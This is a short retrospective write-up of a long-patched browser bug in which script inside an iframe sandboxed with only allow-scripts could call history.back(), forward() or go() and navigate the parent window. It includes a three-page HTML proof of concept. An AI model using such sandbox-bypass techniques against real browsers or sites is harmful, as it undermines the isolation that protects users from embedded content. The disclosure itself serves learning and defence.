A sandboxed iframe with only allow-scripts is not supposed to be able to change its parent’s URL. But any of the history navigation methods — history.back(), history.forward(), history.go() — could be called from inside the sandboxed frame and would navigate the parent window, bypassing that restriction entirely.

<!-- index.html: setup page that adds a history entry before navigating to main.html -->
<a href="main.html">Click me to go to a site with a SandBoxed iFrame</a>
<!-- main.html: page hosting the sandboxed iframe -->
<iframe sandbox="allow-scripts" src="sandboxed.html"></iframe>
<!-- sandboxed.html -->
<input type="button" value="history.back()" onclick="history.back()" />

Clicking the button inside the sandboxed frame navigated the parent window back in history — something it was not supposed to be able to do. The parent needed at least one prior history entry for the bypass to work, but in normal browsing that condition is almost always met.

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.